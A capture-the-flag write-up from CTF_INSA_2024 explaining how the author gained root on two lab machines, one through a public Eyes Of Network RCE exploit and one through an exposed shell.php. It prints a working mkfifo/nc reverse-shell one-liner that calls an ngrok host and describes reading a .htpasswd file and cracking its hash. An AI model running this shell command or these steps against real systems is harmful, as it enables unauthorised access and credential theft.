Home CTFs | CTF_INSA_2024 | Realiste
Post
Cancel

CTFs | CTF_INSA_2024 | Realiste

Réaliste

Le monitoring est important

[realiste1_sujet.png]

In this challenge, we are tasked to become root of the machine. First we go to the login page and can log-in with the credentials admin:admin (before that other teams changed it). [raeliste1_login.png]

There is nothing that looks interesting on this website so can search for online available exploits for Eyes Of Netwok exploit One common website that list exploits is Exploit-DB:

[realiste1_exploit.png]

We can also locally find exploit using the searchsploit tool: [realiste1_searchsploit.png]

After a bit of digging, I found this exploit https://github.com/h4knet/eonrce. For this to work, I only need to specify the website, my IP (here my ngrok) and my port. To do so, I launched my listener and my ngrok:

[realiste1_listener.png]

Now I just have to run the exploit:

[realiste1_final_exploit.png]

When heading back to our listener, we have a root shell and we can now improve it :

[realiste1_root_shell.png]

We can now read the flag at /root/flag.txt

PwnMe

[PwnMe_sujet.png]

In this challenge, we are also tasked to become root of the machine.

First, we can enumerate the website using Gobuster because there is nothing in the source code or on the page:

[realiste2_gobuster.png]

As you can see, there are a lot of results. Lets look at the assets folder: ![[realiste2_assets.png.p(https://raw.githubusercontent.com/Nouman404/nouman404.github.io/main/_posts/CTFs/CTF_INSA_2024/photos/realiste2_assets.png)ng]]

We notice a file called shell.php:

[realiste2_shell.png]

As you can see, we can perform basic Linux command execution, lets try to execute a reverse shell command (and not be loud like the other teams uploading a lot of files): rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4.tcp.eu.ngrok.io 14433 >/tmp/f

We now have a shell as www-data, this user by default don’t have rights but as you can see, we can read the content of /home/debian/.htpasswd:

[realiste2_passwd.png] This gives us the md5 hash of the user debian that we can crack offline using John or Hashcat but also online using crackstation:

[realiste2_md5.png]

We now have the password of the user debian. We can run su debian and provide the found password:

[realiste_debian.png]

As we can see, we can run any commands as debian:

[realiste_sudo_l.png]

So we can get a root shell as follows:

[realiste_sudo.png]

And now we juste have to go to the /root folder and recover the flag:

[realiste_2_flag.png]

This post is licensed under CC BY 4.0 by the author.